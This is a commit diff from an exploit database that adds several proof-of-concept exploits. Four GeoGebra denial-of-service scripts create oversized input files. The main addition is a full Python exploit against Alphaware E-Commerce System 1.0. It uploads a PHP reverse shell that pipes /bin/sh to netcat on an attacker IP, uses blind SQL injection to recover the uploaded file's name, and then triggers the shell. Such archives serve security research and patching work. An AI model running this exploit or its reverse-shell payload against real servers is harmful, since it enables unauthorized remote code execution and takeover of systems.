DB: 2021-03-17
6 changes to exploits/shellcodes GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
This commit is contained in:
parent
28bd450c1a
commit
3e6d011cf0
7 changed files with 188 additions and 0 deletions
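--- a/exploits/android/local/49656.py
+++ b/exploits/android/local/49656.py
@@ -0,0 +1,28 @@
+# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
+# Date: 2021-03-15
+# Author: Brian Rodríguez
+# Software Site: https://www.geogebra.org/download
+# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
+# Version: 5.0.511.0
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Android 10.0.
+
+##### PoC #####
+
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")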
|
@ -5,6 +5,7 @@
|
||||||
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
|
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
|
||||||
# Version: 2.1-3.3
|
# Version: 2.1-3.3
|
||||||
# Tested on: Linux
|
# Tested on: Linux
|
||||||
|
# CVE: CVE-2021-27695
|
||||||
|
|
||||||
Summary:
|
Summary:
|
||||||
|
|
||||||
|
|
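--- a/exploits/php/webapps/49652.py
+++ b/exploits/php/webapps/49652.py
@@ -0,0 +1,76 @@
+# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
+# Date: 15-03-2021
+# Exploit Author: Christian Vierschilling
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html
+# Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: PHP 7.4.14, Linux x64_x86
+
+# --- Description --- #
+
+# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
+# We combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.
+
+# --- Proof of concept --- #
+
+#!/usr/bin/python3
+import random
+import sys
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+def file_upload(target_ip, attacker_ip, attacker_port):
+random_number = str(random.randint(100000000,999999999))
+file_name = "SHELL.php"
+revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
+m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'})
+print("(+) Uploading php reverse shell file ..")
+r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
+return random_number
+
+def trigger_shell_sqli(target_ip,product_id):
+target_file_name = ''
+url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip)
+print("(+) Now setting up our sqli for file name guessing ..")
+
+# STEP 1: Get length of target column in database ..
+for i in range(1, 200):
+payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)}
+r2 = requests.post(url, data=payload, allow_redirects=False)
+
+# STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-)
+if str(r2.status_code) == '302':
+print("(+) Initial sqli successful, got length of our target file name!")
+print("(+) Now for the filename.. ", end = '')
+for j in range(1, i+1):
+for brutechar in range(32, 126):
+payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)}
+r3 = requests.post(url, data=payload, allow_redirects=False)
+if str(r3.status_code) == '302':
+target_file_name = target_file_name + chr(brutechar)
+print(chr(brutechar), end = '')
+sys.stdout.flush()
+break
+
+url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0])
+print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url))
+r4 = requests.get(url)
+
+def main():
+if len(sys.argv) != 4:
+print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
+print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
+sys.exit(-1)
+
+target_ip = sys.argv[1]
+attacker_ip = sys.argv[2]
+attacker_port = sys.argv[3]
+
+product_id = file_upload(target_ip, attacker_ip, attacker_port)
+trigger_shell_sqli(target_ip, product_id)
+
+print("(+) done!")
+
+if __name__ == "__main__":
+main()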
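--- a/exploits/windows/local/49653.py
+++ b/exploits/windows/local/49653.py
@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 6.0.631.0-offlinegraphing
+# Tested on: Windows 8.1 Pro
+
+# STEPS
+# Open the program Graficadora
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the field "Entrada..."
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")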
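--- a/exploits/windows/local/49654.py
+++ b/exploits/windows/local/49654.py
@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 5.0.631.0-d
+# Tested on: Windows 8.1 Pro
+
+#STEPS
+# Open the program GeoGebra
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content in the field "Entrada:"
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 800000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")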
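--- a/exploits/windows/local/49655.py
+++ b/exploits/windows/local/49655.py
@@ -0,0 +1,26 @@
+# Exploit Title: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)
+# Date: 2021-03-15
+# Exploit Author: Brian Rodriguez
+# Vendor Homepage: https://www.geogebra.org
+# Software Link: https://www.geogebra.org/download
+# Version: 6.0.631.0-offlinecas
+# Tested on: Windows 8.1 Pro
+
+# STEPS
+# Open the program Calculadora CAS
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the field "Entrada..."
+# Crashed
+
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")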
|
@ -11286,6 +11286,10 @@ id,file,description,date,author,type,platform,port
|
||||||
49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
49646,exploits/windows/local/49646.txt,"Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
||||||
49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
49647,exploits/windows/local/49647.txt,"eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
||||||
49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
49648,exploits/windows/local/49648.txt,"Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path",2021-03-15,"Luis Martínez",local,windows,
|
||||||
|
49653,exploits/windows/local/49653.py,"GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
|
||||||
|
49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
|
||||||
|
49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,
|
||||||
|
49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -43837,3 +43841,4 @@ id,file,description,date,author,type,platform,port
|
||||||
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,
|
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,
|
||||||
49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
|
49650,exploits/multiple/webapps/49650.py,"Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure",2021-03-15,"Berkan Er",webapps,multiple,
|
||||||
49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,
|
49651,exploits/multiple/webapps/49651.rb,"SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-15,"Berkan Er",webapps,multiple,
|
||||||
|
49652,exploits/php/webapps/49652.py,"Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)",2021-03-16,"Christian Vierschilling",webapps,php,
|
||||||
|
|